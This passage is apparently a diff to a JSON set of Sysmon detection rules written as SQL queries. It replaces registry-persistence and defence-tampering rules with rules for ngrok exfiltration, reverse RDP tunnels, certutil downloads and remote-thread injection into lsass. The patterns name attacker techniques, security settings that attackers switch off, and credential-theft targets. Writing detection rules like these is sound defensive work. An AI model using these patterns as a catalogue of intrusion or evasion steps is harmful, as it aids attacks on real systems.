entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "falsepositives": [ + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unknown" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "description": "Detects remote thread injection events based on action seen used by bumblebee", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects 